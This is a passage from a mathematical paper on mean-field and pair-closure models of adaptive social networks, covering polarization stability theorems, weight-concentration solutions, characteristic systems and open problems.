integrability of $ (h_{++} + h_{--}) f_{+-}^2, $ which yields $f_{+-} \rightarrow 0$ or $h_{++} + h_{--} \rightarrow 0$. The latter can only happen if $\rho_+ - \rho_- = h_{+-} - h_{+-} \rightarrow 0$. This kind of limiting solution with $h_{++}=h_{--}=0$ and $h_{+-}=\frac{1}2$ actually appears as a deficiency of the Kirkwood closure to describe the many-particle limit. Such a solution can appear in the case of two particles, with one in the $+$ and one in the $-$ state. As soon as there are three or more particles, we will find at least two of them in the same state, which implies $h_{++} + h_{--} > 0$.
\subsection{Stationary Solutions and Polarization}
In order to understand possible segregation phenomena we study the stationary solutions of \eqref{eq:minimal1}-\eqref{eq:minimal6}, focusing in particular on the case when two nodes are mainly connected if they have the same state and rather disconnected if the have opposite states. This means that $\beta_{+-}$ is small and $\gamma_{+-}$ is rather large.
We first study the stationary equations for $h_{++}$ and $h_{--}$ in the case of the conditional distribution based closure, which yields $f_{+-}=0$ or
$$ h_{++} = \frac{\alpha_{-+} \rho_+ h_{+-}}{\alpha_{+-} \rho_-}, \quad h_{--} = \frac{\alpha_{+-} \rho_- h_{+-}}{\alpha_{-+} \rho_+}.$$
Together with
$$ 1 = \rho_+ + \rho_- = h_{++} + h_{--} + 2 h_{+-} $$
we arrive at
\begin{align*} &h_{++} = \frac{\alpha_{-+}^2 \rho_+^2}{(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}, \quad h_{--}=\frac{ \alpha_{+-}^2 (1- \rho_+)^2}{(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}, \\
&h_{+-}=\frac{\alpha_{-+}\alpha_{+-} \rho_+ (1- \rho_+)}{(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}.
\end{align*}
Let us mention that in the case $\alpha_{+-} = \alpha_{-+} = \alpha$, they considerably simplify to
$$ h_{++} = \rho_+^2 , \quad h_{--}= \rho_-^2 = (1- \rho_+)^2 , \quad h_{+-}= \rho_+ \rho_- \rho_+ (1- \rho_+) , $$
which corresponds to mixed states and weights. Thus, in order to understand polarization we will focus on the case $f_{+-} =0$ first.
In the case of the Kirkwood closure solutions with $f_{+-}>0$ (and thus $h_{+-}>0$) are obtained only for $h_{++}=h_{--}=0$, which are again not the ones relevant for the many particle limit.
\subsubsection{No link creation between opposite states}
In order to understand the segregation phenomenon in the model, let us first consider the most extreme case of $\beta_{+-} = 0$, hence there are no links created between agents of opposite states $+1$ and $-1$. In this case we trivially find stationary solutions with $f_{+-} =0$:
\begin{prop} \label{minimalstatprop}
Let $\beta_{+-}=0$, $\beta_{++}+\gamma_{++} >0$, and $\beta_{--}+\gamma_{--} >0$. Then there exists an infinite number of stationary solution of \eqref{eq:minimal1}-\eqref{eq:minimal6} as well as of \eqref{eq:minimalk1}-\eqref{eq:minimalk6} with $f_{+-}=0$, $\rho_+ \in [0,1]$ arbitrary, $g_{+-} \in [0,\min\{\rho_+,1-\rho_+\}]$ arbitrary,
and
\begin{align*}
f_{++} &= \frac{\beta_{++}}{\beta_{++}+\gamma_{++}}(\rho_+ - g_{+-}), &&
g_{++} = \frac{\gamma_{++}}{\beta_{++}+\gamma_{++}} (\rho_+ - g_{+-}),\\
f_{--} &= \frac{\beta_{--}}{\beta_{--}+\gamma_{--}} (1-\rho_+ - g_{+-}), &&
g_{--} = \frac{\gamma_{--}}{\beta_{--}+\gamma_{--}} (1-\rho_+ - g_{+-}).
\end{align*}
\end{prop}
The above type of stationary solutions yields a polarization, i.e. unless $\rho_ + = 1$ or $\rho_+=0$ the network consists of two parts with states $+1$ and $-1$, and the corresponding nodes with different states are never connected by an edge.
From the linearized equations of \eqref{eq:minimal1}-\eqref{eq:minimal6} around the stationary state (see Appendix \ref{appendixminimal}) we expect the polarization to be stable if
\begin{equation}
\gamma_{+-} > \frac{\beta_{++}}{\beta_{++}+\gamma_{++}} \frac{ \alpha_{+-} \alpha_{-+}^2 \rho_+}{2 (\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2} + \frac{\beta_{--}}{\beta_{--}+\gamma_{--}} \frac{\alpha_{-+} \alpha_{+-}^2 (1-\rho_+)^2}{2(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}. \label{minimallinstabcondition}
\end{equation}
The linearized problem has a threefold zero eigenvalue however, which makes a rigorous analysis based on linear stability difficult. However, we can provide a nonlinear stability result under a slightly stronger condition.
An analogous result with slightly different condition holds for the linearization of \eqref{eq:minimalk1}-\eqref{eq:minimalk6}.
We see that a sufficient condition for \eqref{minimallinstabcondition} is $ 2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$, which is even sufficient for nonlinear stability of a polarized state:
\begin{thm} \label{thm:nonlinstab}
Let $ 2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$ and let $(f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-})$ be a nonnegative solution of \eqref{eq:minimal1}-\eqref{eq:minimal6}. Then
$$ f_{+-}(t) \leq e^{-(\gamma_{+-}- \frac{\alpha_{+-} + \alpha_{-+}}2)t} f_{+-}(0), $$
\end{thm}
in particular $f_{+-}(t) \rightarrow 0 $ as $t \rightarrow \infty$.
\begin{proof}
Using the nonnegativity of the solution we have $f_{++} \leq \rho_+$ and $f_{--} \leq \rho_-$ and thus
\begin{align*} \partial_t f_{+-} =& - \alpha_{-+} \frac{f_{+-}^2}{2\rho_-} - \alpha_{+-} \frac{f_{+-}^2}{2\rho_+} + \left( \alpha_{+-} \frac{f_{++} }{2\rho_+} + \alpha_{-+} \frac{f_{--} }{2\rho_-} - \gamma_{+-} \right) f_{+-} \\
\leq& \left( \frac{\alpha_{+-} }{2 } + \frac{\alpha_{-+} }{2 } - \gamma_{+-} \right) f_{+-} ,
\end{align*}
which implies the assertion due to Gronwall's Lemma.
\end{proof}
An analogous result can be obtained for the Kirkwood closure, with a slightly stronger condition:
\begin{thm}
Let $ \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$ and let $(f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-})$ be a nonnegative solution of \eqref{eq:minimalk1}-\eqref{eq:minimalk6}. Then
$$ f_{+-}(t) \leq e^{-(\gamma_{+-}- {\alpha_{+-} + \alpha_{-+}})t} f_{+-}(0), $$
\end{thm}
in particular $f_{+-}(t) \rightarrow 0 $ as $t \rightarrow \infty$.
\begin{proof}
The proof is analogous to the one of Theorem \ref{thm:nonlinstab} using the following estimate for the additional term
$$ \frac{h_{+-}}{\rho_+ \rho_-} \leq \min\{ \frac{1}{\rho_+}, \frac{1}{\rho_+} \} \leq 2. $$
\end{proof}
\subsubsection{Rare link creation between opposite states}
Having understood the above extreme case of having no link creation between nodes of opposite states, we can also extend to the case of rare link creation, i.e. $\beta_{+-}$ small. For simple notation we use the notation $\epsilon = \beta_{+-}$ and perform an asymptotic analysis around $\epsilon = 0$ via the implicit function theorem.
\begin{prop} \label{smallepsilonprop}
Let all parameters $\alpha_{**}, \beta_{**}, \gamma_{**}$ be positive and let
$$ 2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}.$$ Then there exists $\epsilon_0 > 0$ such that for all $\gamma_{+-}=\epsilon \in [0,\epsilon_0)$ there exists an infinite number of stationary solution of \eqref{eq:minimal1}-\eqref{eq:minimal6} with $\rho_+ \in [0,1]$ and $f_{+-} = {\cal O}(\epsilon)$.
\end{prop}
Let us remark that the condition $2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$ is not optimal in Proposition \ref{smallepsilonprop}, it was just used to obtain a condition that holds independent of $\rho_+$. If we are interested in the behaviour at a specific value of $\rho_+$ only it could indeed be replaced by \eqref{minimallinstabcondition}. With an analogous proof we can give a statement for the Kirkwood closure:
\begin{prop}
Let all parameters $\alpha_{**}, \beta_{**}, \gamma_{**}$ be positive and let
$$ \gamma_{+-} > \alpha_{+-} + \alpha_{-+}.$$ Then there exists $\epsilon_0 > 0$ such that for all $\gamma_{+-}=\epsilon \in [0,\epsilon_0)$ there exists an infinite number of stationary solution of \eqref{eq:minimalk1}-\eqref{eq:minimalk6} with $\rho_+ \in [0,1]$ and $f_{+-} = {\cal O}(\epsilon)$.
\end{prop}
\section{Vlasov-type model}
In the following we further investigate the paradigmatic model based on the Vlasov-type dynamics, corresponding to the microscopic model \eqref{eq:microscopic1}, \eqref{eq:microscopic2} respectively the Liouville equatione \eqref{eq:liouville} and the corresponding infinite hierarchy, given in weak formulation
\begin{align}
& \int_0^T \int \partial_t \varphi_k(z_k,t) \mu^{\infty:k}_t (dz_k) + \sum_{i \leq k}
\int_0^T \int \nabla_{s_i} \varphi_k(z_k,t)\cdot U(s_i,s_{k+1},w_{ik+1}) \mu_t^{\infty:k+1}(dz_{k+1} )
\nonumber \\ & \qquad \qquad + \sum_{i \leq k} \sum_{j \neq i, j \leq k} \int_0^T \int \nabla_{w_{ij}}
\varphi_k(z_k,t) \cdot V(s_i,s_j,w_{ij}) \mu_t^{\infty:k}(dz_k ) = 0 , \label{eq:hierarchyweak}
\end{align}
with continuously differentiable test functions $\varphi_k$ depending on $z_k$. We start with a case where some kind of propagation of chaos exists, namely if the weights are fully concentrated.
\subsection{Mean-Field Models for Weight Concentration}
As mentioned above there is no propagation of chaos respectively a simple mean-field solution of the infinite hierarchy in general, but we can find such if there is concentration of weights. The latter is not surprising, since once we find weight concentration, the resulting hierarchy is effectively rewritten in terms of the states $s_i$ only. Such states can be found for the paradigmatic model only and are related to special solutions of the form
$w_{ij}=W(s_i,s_j(t),t)$ of \eqref{eq:microscopic1}, \eqref{eq:microscopic2}. Essentially we look for solutions of
$$ \frac{d}{dt}W(s_i(t),s_j(t),t) = V(s_i,s_j,W(s_i(t),s_j(t),t)), $$
which by the chain rule is converted to a transport equation for $W$.
In order to construct weight concentrated mean-field solutions, we look for measures of the form
$$ \mu^{\infty:k}_t(dz_k) = \lambda^k_t(ds_1,\ldots,ds_k) \prod_{i\leq k}\prod_{j \neq i,j \leq k} \delta_{W(s_i,s_j,t)}(dw_{ij}), $$
with some function $W:{\cal S} \times {\cal S} \times (0,T) \rightarrow {\cal W}$ encoding the weights between states $s_i$ and $s_j$. We find
$$ \int_0^T \int \varphi_k(z_k,t) \mu^{\infty:k}_t(dz_k) = \int_0^T \int \psi_k(s_1,\ldots,s_k,t)\lambda^k_t(ds_1,\ldots,ds_k),$$
where we introduce the short-hand notation
$$ \psi_k(s_1,\ldots,s_k,t) = \varphi_k(s_1,\ldots,s_k,W(s_1,s_2,t),\ldots,W(s_{k-1},s_k,t),t). $$
We notice that
$$ \partial_t \psi_k = \partial_t \varphi_k + \sum_i \sum_{j \neq i} \partial_{w_{ij}} \varphi_k \cdot \partial_t W(s_i,s_j,t) $$
and
$$ \nabla_{s_i} \psi_k = \nabla_{s_i} \varphi_k + \sum_{j \neq i} \partial_{w_{ij}} \varphi_k \cdot \nabla_{s_1} W(s_i,s_j,t) + \sum_{j \neq i} \partial_{w_{ji}} \varphi_k \cdot \nabla_{s_2} W(s_j,s_i,t) . $$
Inserting these relations for $\partial_t \varphi_k$ and $\nabla_{s_i} \varphi_k$ into \eqref{eq:hierarchyweak} we obtain
\begin{align}
& \int_0^T \int \partial_t \psi_k(z_k,t) \lambda^{k}_t(ds_1,\ldots,ds_k) \nonumber\\ &\qquad + \sum_{i \leq k}
\int_0^T \int \nabla_{s_i} \psi_k(z_k,t)\cdot U(s_i,s_{k+1},W(s_i,s_{k+1},t)) \lambda_t^{k+1}(ds_1,\ldots,ds_{k+1} )
= R ,
\end{align}
with the remainder term
\begin{align*}
R_k =& \sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot \partial_t W(s_i,s_j,t) \lambda^{k}_t(ds_1,\ldots,ds_k)
+ \\ &\sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot \nabla_{s_1} W(s_i,s_j,t) U(s_i,s_{k+1},W(s_i,s_{k+1},t)) \lambda_t^{k+1}(ds_1,\ldots,ds_{k+1}) + \\ &\sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot \nabla_{s_2} W(s_i,s_j,t) U(s_j,s_{k+1},W(s_j,s_{k+1},t)) \lambda_t^{k+1}(ds_1,\ldots,ds_{k+1} ) - \\&
\sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot V(s_i,s_j,W(s_i,s_j,t)) \lambda^{k}_t(ds_1,\ldots,ds_k) .
\end{align*}
Now we see that there is a special solution of the form
$$ \lambda^{k}_t(ds_1,\ldots,ds_k) = \prod_{i=1}^k \lambda_t^1(ds_i), $$
with $\lambda_t^1$ solving the mean-field equation
\begin{equation} \label{eq:charweightconcentration}
\partial_t \lambda_t^1 + \nabla_{s_1} \cdot \left[ \lambda_t^1 \int U(s_1,s_2,W(s_1,s_2)) \lambda_t^{1}(ds_2) \right] = 0.
\end{equation}
and $R_k$ vanishes if $W$ solves the transport equation
\begin{align*}
\partial_t W(s_1,s_2,t) + \int U(s_1,s_3,W(s_1,s_3)) \lambda_t^{1}(ds_3) \cdot \nabla_{s_1} W(s_1,s_2,t) &\\ +\int U(s_2,s_3,W(s_1,s_3)) \lambda_t^{1}(ds_3) \cdot \nabla_{s_2} W(s_1,s_2,t)
&= V(s_1,s_2,W(s_1,s_2,t)) .
\end{align*}
Let us mention that we can solve \eqref{eq:charweightconcentration} by the method of characteristics
\begin{align}
\partial_t S(t;s_1) &= \int U(S(t;s_1),S(t;s'),\hat W(t;s_1,s')) \lambda^1_0(ds') \label{eq:char1wc} \\
\partial_t \hat W(t;s_1,s_2) &= V(S(t;s_1),S (t;s_2),\hat W(t;s_1,s_2)) \label{eq:char2wc}
\end{align}
with $\hat W(t;s_1,s_2) := W(S(t;s_1);S(t;s_2). $
\begin{prop} \label{weightconcentrationproof}
Let $U$ and $V$ be Lipschitz continuous and let $\lambda^1_0 \in {\cal M}_+(\R^m))$.
Then there exists a unique solution
$$ S \in C^1(0,T;C(\R^m)), \qquad \hat W \in C^1(0,T;C(\R^{2m}))$$
of the characteristic system \eqref{eq:char1wc}, \eqref{eq:char2wc}. Moreover, $s \mapsto S(t;s)$ is a one-to-one map on $\R^{m}$ for each $t > 0$.
\end{prop}
\begin{proof}
Due to the Picard-Lindel\"of Theorem we conclude existence and uniqueness of solutions of \eqref{eq:char1wc}, \eqref{eq:char2wc}.
The fact that $s \mapsto S(t;s)$ is injective follows from the uniqueness of the ODE system, the surjectivity from the analogous existence result that can be applied to \eqref{eq:char1wc}, \eqref{eq:char2wc} with terminal conditions.
\end{proof}
As a consequence of the analysis of the characteristics we immediately obtain the existence and uniqueness of a solution of \eqref{eq:charweightconcentration} as the push-forward of $\lambda_0^1$ under $S$.
\begin{cor}
Let $U$ and $V$ be Lipschitz continuous and let $\lambda^1_0 \in {\cal M}_+(\R^m))$. Then there exists a unique solution $\lambda_t^1 \in C(0,T;{\cal M}_+(\R^m))$ of \eqref{eq:charweightconcentration}.
\end{cor}
\subsection{Closure based on the conditional distribution}
In the following we provide some further mathematical analysis for the more general case, with the closure based on the conditional distribution. Correspondingly we will consider the equivalent system for the single particle distribution $\mu_t^{ 1}$ and the conditional distribution $\gamma_{t} = \frac{\mu_t^{ 2}}{\mu_t^{ 1}}$ instead, which is given by
\begin{align}
\partial_t \mu^{ 1}_t +
\nabla_{s_1} \cdot \left(\int U(s_1,s',w') \gamma_t(s_1;ds',dw') \mu^1_t \right) &= 0 \label{eq:conddist1} \\
\partial_t \gamma_t + \int U(s_1,s',w') \gamma_t(s_1;ds',dw') \cdot \nabla_{s_1} \gamma_t & \nonumber \\
+ \nabla_{s_2} \cdot (\int U(s_2,s',w') \gamma_t(s_2;ds',dw') \gamma_t) +
\partial_w \cdot(V(s_1,s_2,w) \gamma_t)&= 0 \label{eq:conddist2}
\end{align}
Note that we consider $\gamma_t$ as a map from ${\cal S}$ to ${\cal M}_+({\cal S} \times {\cal W})$.
It is straight-forward in this formulation to verify that the equations are consisted with \eqref{eq:charweightconcentration}, i.e. the
weight-concentration case still yields special solutions of \eqref{eq:conddist1}, \eqref{eq:conddist2}. This further leads to the idea to investigate the latter with a similar system of characteristics, which we will discuss in the following.
\subsubsection{A method of characteristics}
In order to analyze the existence and uniqueness of solutions to \eqref{eq:conddist1}, \eqref{eq:conddist2}, we study
the characteristic system
\begin{align}
\partial_t S(t;s_1,w) &= \int U(S (t;s_1,w),S(t;s',w'),W(t;s_1,s',w')) \gamma_0(s_1;ds',dw') \label{eq:char1} \\
\partial_t W(t;s_1,s_2,w) &= V(S(t;s_1),S (t;s_2,w),W(t;s_1,s_2,w)), \label{eq:char2}
\end{align}
which generalizes the one in the case of weight concentration. With an analogous proof to the one of Proposition \ref{weightconcentrationproof}
\begin{prop}
Let $U$ and $V$ be Lipschitz continuous and let $\mu^1_0 \in {\cal M}_+(\R^m), \gamma_0 \in C(\R^m;{\cal M}_+(\R^m \times \R))$
Then there exists a unique solution
$$ S \in C^1(0,T;C(\R^m)), \qquad W \in C^1(0,T;C(\R^{2m+1}))$$
of the characteristic system \eqref{eq:char1}, \eqref{eq:char2}. Moreover, $(s_1,s_2,w) \mapsto (S(t;s_1,w),S(t;s_2,w),W(t;s_1,s_2,w))$ is a one-to-one map on $\R^{2m+1}$.
\end{prop}
Based on the solutions of the characteristic system we can construct a solution of \eqref{eq:conddist1}, \eqref{eq:conddist2}: we define $\mu^1_t$ as the push-forward of $\mu^1_0$ under $S$ and $\gamma^t$ via
$$ \int \int \varphi(S(t;s_2,w),W(t;s_1,s_2,w)) \gamma_t(S(t;s_1,w);ds_2,dw) = \int \int \varphi(s_2,w) \gamma_0(s_1;ds_2,dw). $$
for all $t \in [0,T]$, $s_1 \in \R^m$ and $\varphi \in C_b(\R^{m+1})$.
\begin{cor}
Let $U$ and $V$ be Lipschitz continuous and let $\mu^1_0 \in {\cal M}_+(\R^m), \gamma_0 \in C(\R^m;{\cal M}_+(\R^m \times \R))$. Then there exists a unique solution $\mu_t^1 \in C(0,T;{\cal M}_+(\R^m))$, $\gamma_t \in C(0,T;C(\R^m;{\cal M}_+(\R^m \times \R)))$ of \eqref{eq:conddist1}, \eqref{eq:conddist2}.
\end{cor}
\subsubsection{Propagation of gradient flow structures}
In a gradient flow setting ($U = - \nabla_s F, V= - c \partial_w F$), we can rewrite the energy as
$$ \hat E(\mu^2) = \int \int \int F(s_1,s_2,w) \mu^2(ds_1,ds_2,dw) . $$
It is thus more convenient to use the formulation in terms of the pair distribution $\mu^2$ instead of \eqref{eq:conddist1}, \eqref{eq:conddist2}. We have
\begin{align*}
\partial_t \mu^{ 2}_t =& \nabla_{s_1} \cdot (\int \nabla_{s_1} F(s_1,s',w') \gamma_t(s_1;ds',dw') \mu^2_t)
+ \nonumber \\
& \nabla_{s_2} \cdot (\int \nabla_{s_2} F(s',s_2,w') \gamma_t(s_2;ds',dw') \mu^2_t) + c \partial_w \cdot( \partial_w F(s_1,s_2,w) \mu^2_t),
\end{align*}
which is indeed an abstract gradient flow formulation, since it applies a negative semidefinite operator to the energy variation. The energy dissipation is given by
\begin{align*}
\frac{d}{dt} \hat E(\mu_t^2) =& - \int \left\vert \int \int \nabla_{s_1} F(s_1,s',w') \gamma_t(s_1,ds',dw') \right\vert^2 \mu_t^1(ds_1) \\& - \int \left\vert \int \int \nabla_{s_2} F(s_2,s',w') \gamma_t(s_2,ds',dw') \right\vert^2 \mu_t^1(ds_2) \\& - c \int \int \int |\partial_w F(s_1,s_2,s_3|^2 \mu_t^2(ds_1,ds_2,dw).
\end{align*}
Thus, the gradient flow structure and energy dissipation is propagated through this kind of closure, which appears to be a unique property for this kind of closure. In the general case the first two dissipation terms on the right-hand side would change, e.g. the first one to
$$
- \int \int \int \int \int \nabla_{s_1} F(s_1,s_3,w_{13}) \nabla_{s_1} F(s_1,s_2,w_{12}) \mu_t^3(ds_1,ds_2,ds_3,dw_{12} dw_{13},dw_{23})
$$
and with other closures such as the Kirkwood closure there is no particular reason for this term to be negative or in other terms the associated bilinear form of $F$ is not definite.
\section{Variants and Open Problems}
\subsection{Weight Interactions and Balance Theory}
In our previous treatment we have assumed that there is no interaction between weights, but this was mainly a simplification to present the basic approach. Many recent treatments of social network formation rely on social balance theory, which effectively implies that the change of network links (weights) depends on the weights in a triangle with a third agent (cf. \cite{belaza,pham,pham2,ravazzi}). In our modelling approach this is a minor modification at the microscopic level to
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j\neq i} D_{s_i}^* (U(s_i,s_j,w_{ij}) \mu_t^N) + \frac{1}N\sum_{i=1}^N \sum_{j\neq i}
\sum_{k\neq i,j} D_{w_{ij}}^* (V(s_i,s_j,w_{ij},w_{ik},w_{jk}) \mu_t^N) \nonumber \\
& + \sum_{i=1}^N D_{s_i}^* (U_0(s_i) \mu_t^N) - \sum_{i=1}^N D_{s_i}^* D_{s_i} (Q(s_i) \mu_t^N) - \sum_{i=1}^N \sum_{j\neq i} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu_t^N). \label{eq:weightinteraction}
\end{align}
There is however an interesting consequence for the macroscopic description, since we will get an integral involving a higher order moment also in the term with $V$. A simple closure based on the conditional distribution will definitely not suffice if $V$ depends on a triangle of weights, hence the Kirkwood closure seems to be the apparent option.
\subsection{Beyond Pair Interaction}
As we have seen already in the example of the voter model from \cite{thurner} above, several models go beyond a simple pair interaction, e.g. with triplets (cf. \cite{lambiotte,zanette,neuhaeuser}) or with interactions via the degree (cf. \cite{kohne,raducha,tur}), which effectively averages over weights. Another effect found in some models is an averaging of states of the network or adjacent nodes (cf. e.g. \cite{baumann}). Since many social processes may indeed appear from interaction of more than two agents, it will be an interesting direction to advance the approach to such cases and study their effects on pattern formation. In particular it will be relevant to study whether the pair distribution is still sufficient to provide a suitable approximation.
\subsection{Analysis of Pair Closures}
From a mathematical point of view, an important open challenge is the analysis of pair closures that seem inevitable in the case of network problems. Already the analysis of the arising equations for the pair distribution is not fully covered by the existing PDE theory, it is also open whether it is more suitable to study the formulation with the pair distribution or rather the one with the conditional distribution.
Also the analysis of gradient structures or generalizations at the level of the pair distribution is an interesting topic for further investigations, related to the evolution of gradient structures like in \cite{burger} and possibly with other structures as in \cite{maas} for discrete models.
An even more challenging question is the analysis of pair closure relations for the BBGKY-type hierarchy, for which one would possibly need similar quantitative estimates as for the mean-field limit in \cite{mischler,paul}, which currently seem out of reach. Another level of complication would be to go beyond the mean-field scaling we have confined our presentation to.
From a more practical point of view it needs to be investigated which macroscopic models are efficient for simulations and in particular which can be effectively calibrated from data in order to make more than rough qualitative predictions.
\section*{Acknowledgements}
The author acknowledges partial financial support by European Union’s Horizon 2020 research and
innovation programme under the Marie Sklodowska-Curie grant agreement No. 777826
(NoMADS) and the German Science Foundation (DFG) through CRC TR 154 "Mathematical Modelling, Simulation and Optimization Using the Example of Gas Networks", Subproject C06.
| 2024-02-18T23:40:20.281Z | 2021-04-29T02:20:03.000Z | algebraic_stack_train_0000 | 2,101 | 11,229 |